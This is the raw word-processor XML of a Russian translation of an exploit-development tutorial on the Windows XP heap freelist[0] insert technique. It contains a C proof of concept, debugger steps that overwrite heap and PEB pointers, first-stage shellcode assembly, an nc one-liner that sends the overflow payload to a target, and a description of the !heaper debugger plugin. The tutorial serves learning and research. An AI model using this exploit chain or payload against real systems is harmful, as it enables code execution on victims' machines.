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1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Style w:val="InternetLink"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://www.fuzzysecurity.com/tutorials/mr_me/4.html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Переполнение буфера кучи. Часть 3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Привет, ребята. Некоторое время назад я рассказывал о древней, но важной технике переполнения буфера кучи в Windows XP SP3. Сегодня я расскажу о еще одной. Вдобавок я познакомлю вас с моим плагином для Immunity Debugger под названием !heaper.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первую очередь как человек, понимающий технические сложности и тонкости, связанные с этой темой, хочу поблагодарить всех исследователей безопасности за ту работу, которую они провели до меня. Если бы не эти люди, этой серии статей не было бы.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Поэтому ОГРОМНОЕ спасибо Бретту Муру (Brett Moore), Николасу Вайсману (Nicolas Waisman) и Крису Валасик (Chris Valasek). Ваша работа за гранью исключительного.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Ну что ж, начнём?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декабре 2005 Бретт Мур опубликовал очень интересное исследование: "Эксплуатация freelist[0] в XP SP2". В частности были рассмотрены два полезных метода, с помощью которых можно атаковать freelist[0]. Мы рассмотрим только одну из них - вставку во freelist[0], в связи с её практичностью.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Вам потребуется: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Windows XP с установленным SP2/SP3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- Immunity Debugger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- pyparser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- graphviz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- heaper.py - плагин к immunity debugger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- Компилятор C/C++ (Dev C++, lcc-32, MS visual C++ 6.0 (если вы сможете его достать)).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- Удобный для вас скриптовый язык (Я использую python, вы можете пользоваться perl)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- Мозги (и/или настойчивость)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- Некоторые знания Ассемблера, C. Также умение использовать плагин HideDbg для Olly или !hidedebug в Immunity debugger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- Время.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Вставка во freelist[0]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[Идея этой атаки заключается в перезаписи указателя blink в чанке freelist[0]. При вставке чанка перед перезаписанным blink не проверяется перед обновлением указателей flink/blink. Проверка на разрыв связи списка происходит только в манипулируемых чанках и его соседях, но не в тех, связи которых изменяются.]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Чтобы исправить эту проблему в Windows 7 программисты Microsoft добавили проверку, похожую на следующий сниппет псевдокода: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if (chunk[blink] -&gt; PrevChunk &amp;&amp; PrevChunk[flink] -&gt; chunk)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    </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>proceed()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Если ссылки на соседей в чанке до, и в чанке после проверены, разумеется это решает проблему и не позволяет атакующему устанавливать произвольный указатель или присваивать произвольное значение, указывающее на неконтролируемый адрес. Ниже грубый пример, с которым мы будем работать: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/*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exploiting freelist[0] (insert)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technique by Brett Moore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poc example by Steven Seeley</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>*/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>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#include &lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>int main(int argc,char *argv[])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>{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char *a,*b,*c,*x,*y,*z;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long *hHeap;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hHeap = HeapCreate(0x00040000,0,0);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a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,1200);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b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,1024);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c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,2048);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freelist[0] has 'c' chunk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c);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overwrite b so that we spill into c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set c's blink to lookaside[3]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printf("(+) Chunk b: 0x%08x\n",b);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printf("(+) Fill chunk b (using 1024 bytes), overflowing chunk c:\n");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overflow b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using 1024 A's + BBBBCCCCDDDDEEEE (E=blink) (D=Flink)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overflow with blink set to 0x00480718 (lookaside[3])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gets(b);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free 'a' so that freelist[0] looks like this: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freelist[0]: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chunk b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chunk a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chunk c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the 'insert'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a);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now lookaside[3] should be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lookaside[3]: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 chunk b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 chunk a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       chunk ?        (fake chunk created from the overwrite)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 flink we control from overwrite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pop off the lookaside until we reach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our fake chunk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x = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);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y = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);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z = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);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write shellcode at controlled freelist flink (lookaside fake chunk)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gets(z);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exit(0);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE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Несмотря на то что этот код не является примером из реального мира, его задача продемонстрировать технику, котор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ую</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">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 xml:space="preserve">можно </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>использова</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ть </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>позже с какой-либо программой.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6332220" cy="20916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Скомпилируйте его или скачайте готовый бинарник (b33f: бинарника нет). Открыв его в отладчике, вы увидите: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Спускайтесь ниже, пока не увидите вызовы API из main: HeapCreate, HeapAlloc, HeapFree. Установите точку останова на втором HeapFree и последующих HeapAlloc'ах.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679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Теперь нужно скрыть факт того, что программа запущена под отладчиком, используем команду '!hidedebug all_debug', чтобы пропатчить все API вызовы.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6858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При запуске приложение попросит ввести какие-нибудь данные. Так как данные подаются на стандартный поток ввода (STDIN), у нас не получится просто скопировать туда бинарные данные. Чтобы было понятнее, мы скормим программе ASCII текст, а затем исправим его в памяти.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Внимательный читатель заметит, что чанк, в который мы пишем, имеет размер 1024 байта. Любые данные длинной больше этого размера переполнят буфер и дадут нам контроль за выполнением. Чтобы получить полный контроль, потребуется перезаписать 16 байт: в первых 8-ми хранится заголовок следующего чанка, в остальных - указатели flink/blink. Давайте сгенерируем данные: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131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Отлично, скопируем их на вход приложения. Отладчик остановится на вызове HeapFree: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18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Проанализируем происходящее. Для начала взглянем на freelist и осмотрим его структуру командой !heaper ab -g.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30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Ту же информацию можно представить визуально командой !heaper ab 490000 -g. Она создаст картинку с изображением графа и сохранит её в 'C:\Program Files\Immunity Inc\Immunity Debugger\' (по умолчанию имя картинки 'freelist_graph.png').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605790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Легко заметить, что flink/blink перезаписаны нашими данными. Теперь мы хотим перезаписать blink, хранящийся в элементе lookaside[3]. На данном этапе массив lookaside пока пуст, но мы подделаем несколько элементов. Заменим указатель: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77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Элемент freelist[0] с изменённым указателем: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2115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Отлично, а сейчас важный момент. Когда мы сделаем один шаг отладчиком после вызова HeapFree, мы заметим серьёзные изменения. В lookaside[3] появятся 3 элемента, а наш flink станет flink'ом подделанного чанка в lookaside. Использовав '!heaper af [heap]' или '!heaper analysefrontend [heap]', вы увидите следующее:</w:t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35077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Напомню, что для получения графа можно использовать команду !heaper af 490000 -g. В этом случае имя по умолчанию будет lal_graph.png. Его можно изменить флагом -f.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512445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Продолжим выполнение до следующего вызова HeapAlloc, мы увидим, что flink возвращется из любого элемента lookaside.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537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Разумеется 0x43434343 не является указателем на существующий чанк, а нам нужно, чтобы flink указывал на доступную для чтения/записи память. Для этого мы возьмём из PEB указатель на функцию FastPEBLockRoutine, описанный в предыдущей статье.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Там сказано</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>что</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> указатели в PEB рандомизированы, но так как я всего лишь демонстрирую метод, мне нужен просто </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">доступный для записи </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">указатель. Чтобы получить его значение, воспользуемся командой '!heaper dp -m'. Она покажет нам содержимое управляющей стуктуры PEB.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П</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>о смещению 0x20 находится указатель на FastPEBLockRoutine.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35052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Пропатчим 0x43434343 в элементе lookaside[3]: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6682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Теперь можно просто возобновить работу программы, и чанк будет доступен для чтения и записи. В итоге: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Мы добились ситуации, в которой возможна запись данных/шеллкода в любые 4 байта в памяти.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При попытке вызова из RtlAcquirePebLock+0x28 FastPEBLockRoutine(). Поскольку FastPEBLockRoutine() использует текущий PEB с контролируемым нами указателем, мы можем заменить его на адрес нашего шеллкода.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С этого момента, запустить шеллкод проще простого [......] и потребуется выполнение кода по указателю в EAX. К тому же первый этап шеллкода должен будет пропатчить указатель, который мы перезаписали. Ниже заготовка, как это можно сделать.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433832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В конечном итоге она будет транслирована в что-то типо этого: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.386</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>.model flat, stdcall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>option casemap:none</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE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.code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>start:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>mov eax, 7c901deh ; ntdll.RtlEnterCriticalSection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>mov ecx, 7ffdf01ch ; offset in the PEB 0x1f (yours will be different)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>add ecx, 4h</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>mov dword ptr ds:[ecx],eax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE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end start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Таким образом указатель будет восстановлен, и шеллкод не будет вызываться бесконечно. Конечно, в Windows XP SP3 это всё должно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производиться</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> динамически, если адрес PEB был подобран перебором. Я оставлю сообразительному читателю расширение </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">этой </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ассемблерной заготовки до работы с динамическим PEB и правкой смещения 0x20. Вы может использовать fs:[0x30].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</w:rPr>
        <w:t>00401000 &gt; $ B8 DE55F777    MOV EAX,ntdll.RtlEnterCriticalSection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</w:rPr>
        <w:t>00401005   . B9 1CF0FD7F    MOV ECX,7FFDF01C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</w:rPr>
        <w:t>0040100A   . 83C1 04        ADD ECX,4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:t>0040100D   . 8901           MOV DWORD PTR DS:[ECX],EAX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Если </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">мы </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>в следующий раз захотим эксплуатировать приложение одной командой, она будет выглядеть так (предполагается, что мы передаём данные по сокету):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python -c "\x41" * 1024 + "\x42" * 8 + "\x20\xf0\xfd\x7f" + "\x18\x07\x49" | nc -v &lt;target&gt; &lt;ip&gt;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Разумеется NULL байт будет добавлен в конце строки.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Требования и ограничения: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Вы должны знать базовый адрес кучи, структуру которой хотите переполнять. Это не так просто, как может показаться, но [утечки информации сильно в этом помогут].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Вам потребуется заранее определить базовый адрес PEB, или хотя быть использовать другой указатель на функцию, который вы сможете перезаписать и который будет вызван. Про это я расскажу позже.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Вы должны контролировать размер выделяемых чанков.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Вы должны имет возможность заставить приложение освободить чанк, который меньше перезаписанного, но больше того, что вы переполнили. Это может происходить без конкретного правила, однако контроль над размерами выделяемых чанков и над временем, когда они освобождаются безусловно помогут.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Heaper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Когда я пытался разобраться в методах переполнения кучи, мне часто требовалось визуалировать структуры кучи. Для этого я обычно исползовал Immunity Debugger (вывод !heap в windbg совершенно безумен). Тогда мне не удалось найти инструмент в Immunity Debugger, который мог бы проанализировать кучу и определить возможность эксплуации. С учётом того, что Immunity это отладчик, ориентированный на "эксплойты", я решил написал плагин, который не только визуализирует структуры кучи, но и определяет возможность эксплуатации, исползуя несколько эвристик.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настоящий момент, пла</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>гин</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> не использует эвристические проверки, однако они появятся в ближайшем будущем. Пока он ли</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>шь</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> проверяет возможность перезаписи указателей flink/blink, а также было ли перезаписано поле заголовк</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">а, содержащее </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>размер чанк</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. В течение ближайших месяцев появит</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>с</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>я поддержка Windows 7. Пока я провожу анализ возможных эксплуатаций и требуемых для них условий.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Убедитесь, что у вас установлены pydot, pyparser и graphviz и сохраните код плагина в 'C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands\'. Вызвать помощь можно командой !heaper.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527685</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5276850" cy="199072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Я уже отмечал, что </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">не так то просто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 xml:space="preserve">найти </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>указател</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ь</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, который можно будет перезаписать. Более того, вам нужно будет убедиться, что найденный указатель будет вызван после нашего переполнения. !heaper поможет нам решить эту проблему.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 его помощью вы можете сдампить все указатели на функции в секции .data командой '!heaper dumpfunctionpointers' или '!heaper dfp'.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Чтобы пропатчить указатель на функцию значением по умолчанию 0x41414141 введите команду '!heaper dfp -p &lt;указатель на функцию&gt;'. Чтобы пропатчить их [все]: '!heaper dfp -p all'.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Можно также восстановить исходное значение командами '!heaper -r &lt;указатель на функцию&gt;' и '!heaper -r all'.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1762125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1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Восстановление указателя, пропатченного выше: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6305550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1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Идея заключается в том, что мы патчим все указатели на функции и запускаем приложение. Далее мы ждём вызова одной из этих функций. В случае ошибки доступа, мы можем найти значение указателя на стеке.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Существует множество других функций, поэтому я призываю читателя самостоятельно изучить возможности плагина и поделиться со мной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 xml:space="preserve">своим мнением </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>и идеями о том, что бы вы хотел</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>и</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> добавить. Примеры некоторых предложений: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Добавить перехват хуков некоторых вызовов кучи, таких как VirtuallAlloc, HeapAlloc, HeapFree, HeapCreate  и так далее, с выводом их аргументов (по возможности с возвращаемым значением).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Выводить статистику по heap spray. Например, количество используемых в атаке блоков, их размер, смещение в блоке, с которого начинается нагрузка.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Добавить поддержку Windows 7 с LFH и убедиться, что работает графический вывод.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Добавить эвристики и убедиться, что их оценки достаточно точны. Начата работа над четырьмя видами атак: инверсия битов (bitmap flipping), вставка во freelist[0], поиск по freelist[0] и перезапись чанка в lookaside.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Как видите, впереди много работы, но я надеюсь, это поможет кому-то разобраться с эксплуатацией кучи.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imbus Mono PS:-lig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urce Han Sans CN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Source Han Sans C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Source Han Sans C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LibreOffice/6.3.5.2$Linux_X86_64 LibreOffice_project/30$Build-2</Application>
  <Pages>15</Pages>
  <Words>1716</Words>
  <Characters>10496</Characters>
  <CharactersWithSpaces>12379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2020-05-10T17:46:33Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-11T06:22:17Z</dcterms:modified>
  <cp:revision>3</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>